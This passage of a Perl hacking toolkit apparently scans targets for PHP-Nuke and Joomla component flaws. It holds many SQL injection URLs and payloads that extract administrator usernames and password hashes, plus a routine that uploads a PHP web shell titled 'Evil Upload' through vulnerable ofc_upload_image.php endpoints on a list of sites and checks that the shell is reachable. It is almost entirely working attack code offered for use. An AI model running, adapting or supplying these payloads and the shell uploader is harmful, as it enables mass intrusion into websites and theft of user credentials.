- "modules.php?name=Sections&op=viewarticle&artid=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2",
- "modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*",
- "modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*","modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*",
- "modules.php?name=Docum&op=viewarticle&artid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2",
- "modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/aid,2/**/from/**/nuke_authors/*where%20admin%20-2",
- "modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2",
- "modules.php?name=Manuales&d_op=viewdownload&cid=1/**/union/**/select/**/0,aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*",
- "modules.php?name=Siir&op=print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202",
- "modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2",
- "modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors",
- "modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors",
- "modules.php?op=modload&name=My_eGallery&file=index&do=showgall&gid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*");
- system('cls');
- print "PhpNuke SQl Scanner\n";
- print "Enter Target (http://www.target.il/)\n";
- print ">>";
- my $nuketarget = <>;
- chomp $nuketarget;
- foreach $Nuke(@Nuke){
- my $URLL = $nuketarget.$Nuke;
- my $Sourcee = get $URLL;
- die "Can not get $URLL" unless defined $URLL;
- if ($Sourcee =~/([0-9a-f]{32})/) { $Messagee ="Vulnerability FOUND";}
- else { $Messagee = "NOT FOUND Vulnerability";}
- print "$URLL => $Messagee\n";
- print "\n \n \n \n \t \t \t \t FINISH ";
- open (TEXT, '>>Nuke.txt');
- print TEXT "\n$URLL => $Messagee \n\n";
- close (TEXT);
- }
- }
- if($targett eq '6')
- {
- system('cls');
- system('title Base64 Decoder');
- print color("green"),"Enter String Base64 you want Decode:";
- $decode=<STDIN>;
- chomp $decode;
- $zeb=decode_base64($decode);
- print " Decoded success : \n\n $zeb \n";
- }
- if($targett eq '5')
- {
- system('cls');
- system('title Base64 Encoder');
- print color("green"),"Base64 Encoder\n";
- print " Enter String:";
- $hash=<STDIN>;
- chomp $hash;
- $t=encode_base64($hash);
- print "Encoded Succes : \n\n $t \n";
- }
- if($targett eq '1')
- {
- system('cls');
- print color("green"),"\n[1] Joomla RCI Scanner\n";
- print color("green"), "[2] Joomla SQL Scanner\n";
- print color("green"), "[3] Joomla LFI Scanner\n";
- print color("green"), "[4] Joomla RFI Scanner\n";
- print color("green"), "[5] Joomla JCE Vuln\n";
- print color("green"), "\nChoose Number :";
- my $c = <>;
- chomp $c;
- if($c eq '1')
- { #Script Original Coded by M-A Labz
- system('cls');
- system('title Joomla Component RCI scanner');
- print color("bold red"),"\n[+]Joomla Components RCI Exploits Scanner \n";
- print color 'reset';
- print color("green"),"[+] Enter File (List of site file) : ";
- print color 'reset';
- $file=<STDIN>;
- chomp($file);
- open (file, "<$file") || die "[-] Can't open the List of site file !";
- my @file = <file>;
- close file;
- foreach $webs (@file)
- {
- chomp $webs;
- $site = $webs;
- print color("green"), "[+] Scanning $site\n";
- print color 'reset';
- @paths=('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php');
- foreach $path(@paths)
- {
- $site_vul = "http://".$site."".$path."?name=tt7.php";
- $data = "php code";
- $data.= ' <title>Evil Upload</title> ';
- $data.= ' <h1>Evil Upload</h1> ';
- $data.= '<?php ';
- $data.= "echo '<b><br><br>'.php_uname().'<br></b>'; ";
- $data.= 'echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\'; ';
- $data.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; ';
- $data.= "if( \$_POST['_upl'] == \"Upload\" ) { ";
- $data.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } ";
- $data.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } ";
- $data.= " } ";
- $data.= "?>";
- $res = $ua->request(POST $site_vul,Content_Type => 'text/plain', Content => $data);
- if ($res->is_success){
- print color("green"), "[+] $site is vul\n";
- print color 'reset';
- @vulns=('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/tt7.php','/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/tt7.php','/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/tt7.php','/administrator/components/com_jinc/classes/graphics/tmp-upload-images/tt7.php','/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/tt7.php','/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/tt7.php');
- foreach $vul(@vulns)
- {
- $url = "http://".$site. $vul;
- $request = HTTP::Request->new(GET=>$url);
- $useragent = LWP::UserAgent->new();
- $response = $useragent->request($request);
- if ($response->content=~m/<title>Evil Upload<\/title>/g){
- print color("green"), "[+] Found => $url\n\n";
- print color 'reset';
- open(BEN,">>result-$site.txt");
- print BEN "$url\n";
- close(BEN);
- }else{
- print "[-] Not Found \n";
- }
- }
- }
- }
- }
- }
- if($c eq '2')
- {
- system('cls');
- system('title Joomla Sql Scanner');
- ###xpl###
- $com_jeajaxeventcalendar="/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--";
- $com_storedirectory="UNION SELECT 1,2,concat_ws(0x3a,username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from jos_users";
- $com_annuaire="/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--";
- $com_maianmedia="+union+all+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--";
- $com_alfurqan15x="+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--";
- $com_markt="+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--";
- $com_sponsorwall="+and+1=0+union+select+1,2,concat(username,0x3a,password)fl0rix,4,5,6,6,7,8,9,10+from+jos_users--";
- $com_flipwall="+union+select+1,2,3,4,5,concat(username,0x3a,password)fl0rix,7,8,9,10+from+jos_users--";
- $jedirectory="+1+union+select+1,2,concat(0x23,0x23,0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23),4,5,6,7,8,9,10,11+from+jos_users+where+id=userid--";
- $com_ezautos="+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--";
- $com_arash="+and 1=0 UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from jos_users";
- $com_taxes="+union+all+select+1,group_concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,4,5,6,7,8,9,10,11+from+jos_users--";
- $com_vat="+union+all+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--";
- $com_blogs="/**/ AND /**/ 1=2 /**/ UNION /**/ SELECT /**/ 0,1,2,3,version(),database(),concat(username,0x3a,password) /**/ from /**/ jos_users--";
- $com_gr="+union+select+1,concat(username,0x3a,password)+from+jos_users--";
- $com_simpleshop="UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--";
- $com_youtube="union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--";
- $com_joomdle="-999.9'+UNION+ALL+SELECT+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+mdl_user--+and+'kaMtiEz'='kaMtiEz";
- $com_itaromry="?filter_search=&filter_level=1&filter_race=*&filter_class=8+and+1=2+union+all+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+from+jos_users--+";
- $com_iproperty="/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
- $com_huruhelpdesk="/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--";
- $com_jomtube="+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube";
- $com_spa="%20UNION%20SELECT%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13%20from%20jos_users--";
- $com_staticxt="+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users";
- $com_ybggal="+and+1=2+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users--";
- $com_quran="/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e)r3m1ck,3,4,5/**/FROM/**/jos_users--";
- $com_konsultasi="/**/union/**/select/**/all/**/1,2,3,4,concat(username,0x3a,password)c4uR,6,7,8,9/**/from/**/jos_users--";
- $com_newsfeeds="%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--";
- $wapmain="+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--";
- $com_abc="+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--";
- $com_joomradio="+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--";
- $com_jtm="/**/union/**/all/**/select/**/concat_ws(0x3a,username,password)/**/from/**/jos_users--&task=search";
- $com_gbufacebook="+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--+and+'kaMtiEz'='kaMtiEz";
- $com_manager="/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
- $com_jp_jobs="/**/union/**/all/**/select/**/1,2,group_concat(username,char(58),password)v3n0m,4,5,6,7,8,9,10,11,12,13,14/**/from/**/jos_users--";
- $com_sermonspeaker="/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/";
- $com_jdrugstopic="+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--";
- $com_mv_restaurantmenumanager="+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users";
- $com_articles="+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10+from+jos_users—-";
- $com_dcs_flashgames="+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--";
- $com_bidding="+UNION ALL SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from jos_users--";
- $com_acteammember="+UNION+SELECT+1,2,3,4,5,concat(username,0x20,password),7,8,9,10,11,12,13,14,15+from+mos_users--&Itemid=121&lang=en";
- $com_acstartseite="+and+1=2+union+select+1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users〈=de";
- $com_productbook="+UNION all SELECT 1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+condev.jos_users--";
- $com_yelp="+UNION+ALL+SELECT+1,2,3,concat_ws(0x3a3a3a,username,password),5,6,concat_ws(0x3a3a3a,username,password),8,9,10,11,12,13,14,15,16,17+FROM+jos_users--";
- $com_dms="+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--";
- $com_jbpublishdownfp="+union+all+select+concat(username,0x3A3A3A,password)+from+jos_users";
- $com_casino="+union+all+select+1,username,password,4,5+from+jos_users/*";
- $com_doqment="/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--";
- $com_alfresco="/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users--";
- $com_countries="/**/union/**/select/**/concat(username,0x3a,password)fl0f0r3v3r/**/from/**/jos_users";
- print color("green"),"\nTarget page: http://wwww.site.com/ : ";
- chomp(my $target=<STDIN>);
- $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
- $b->agent('Mozilla/5.0 (compatible; MSIE 7.0; Windows)');
- $host = $target . "/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-999 .$com_jeajaxeventcalendar.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){
- print "[*] Results : CHECK : \n";
- print "Joomla JE Ajax Event Component (com_jeajaxeventcalendar) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_storedirectory&task=view&id=-999 .$com_storedirectory.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_storedirectory) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_annuaire&view=annuaire&type=cat&id=-999 .$com_annuaire.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla (com_annuaire) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_maianmedia&view=music&cat=-999 .$com_maianmedia.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_maianmedia) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999 .$com_alfurqan15x.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_alfurqan15x) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_markt&page=show_category&catid=999 .$com_markt.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_markt) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_sponsorwall&controller=sponsorwall&catid=9999 .$com_sponsorwall.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_sponsorwall) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_flipwall&controller=flipwall&catid=999 .$com_flipwall.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_flipwall) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_jedirectory&view=item&catid=999 .$jedirectory.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla JE Directory SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_ezautos&Itemid=999&id=1&task=helpers&firstCode=999 .$com_ezautos.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_ezautos) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_arash&id=999 .$com_arash.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_arash) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_taxes&id=-999 .$com_taxes.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_taxes) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_vat&id=-999 .$com_vat.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_vat) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_blogs&task=details&b_id=999 .$com_blogs.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_blogs) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_blogs&task=details&b_id=-999 .$com_gr.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_gr) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_simpleshop&Itemid=xx&task=viewprod&id=-999 .$com_simpleshop.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_simpleshop) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_youtube&id_cate=999 .$com_youtube.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_youtube) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_joomdle&view=detail&cat_id=1&course_id=.$com_joomdle.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_joomdle) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_itarmory&view=guildmembers&Itemid=.$com_itarmory.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_itarmory) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_iproperty&view=agentproperties&id=-999999 .$com_iproperty.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_iproperty) SQL Injection Vulnerability ! \n\n";
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=999 .$com_huruhelpdesk.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_huruhelpdesk) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?view=videos&type=member&user_id=-999 .$com_jomtube.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_jomtube) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_spa&view=spa_read_more&pid=-999 .$com_spa.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_spa) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_staticxt&staticfile=test.php&id=-999 .$com_staticxt.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_staticxt) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_ybggal&Itemid=999&catid=999 .$com_ybggal.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_ybggal) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_quran&action=viewayat&surano=999 .$com_quran.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_quran) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_konsultasi&act=detail&sid=999 .$com_konsultasi.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_konsultasi) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_newsfeeds&view=categories&feedid=-999 .$com_newsfeeds.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_newsfeeds) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/wap/wapmain.php?option=onews&action=link&id=-999 .$wapmain.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (wapmain.php) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_abc&view=abc&letter=AS§ionid=-999 .$com_abc.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_abc) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index2.php?option=com_joomradio&page=show_video&id=-999 .$com_joomradio.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_joomradio) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_jtm&view=search&view=search&author=-999 .$com_jtm.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component JTM Reseller SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_gbufacebook&task=show_face&face_id=-999 .$com_gbufacebook.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_gbufacebook) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_manager&view=flight&Itemid=999 .$com_manager.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_manager) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_jp_jobs&view=detail&id=-999 .$com_jp_jobs.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_jp_jobs) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_sermonspeaker&task=latest_sermons&id=-999 .$com_sermonspeaker.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_sermonspeaker) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_jdrugstopics&view=drugsdetails&id=-999 .$com_jdrugstopics.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_jdrugstopics) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=999 .$com_mv_restaurantmenumanager.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_mv_restaurantmenumanager) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_articles&task=view_addarticles&sid=999 .$com_articles.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_articles) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_dcs_flashgames&Itemid=61&catid=999 .$com_dcs_flashgames.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_dcs_flashgames) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_bidding&id=-999 .$com_bidding.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
- $answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
- print "[*] Results : CHECK : \n";
- print "Joomla Component (com_bidding) SQL Injection Vulnerability ! \n\n"
- }
- else{print "\n[-] Error\n";
- }
- $host = $target . "/index.php?option=com_acteammember&id=-999 .$com_acteammember.";
- $res = $b->request(HTTP::Request->new(GET=>$host));
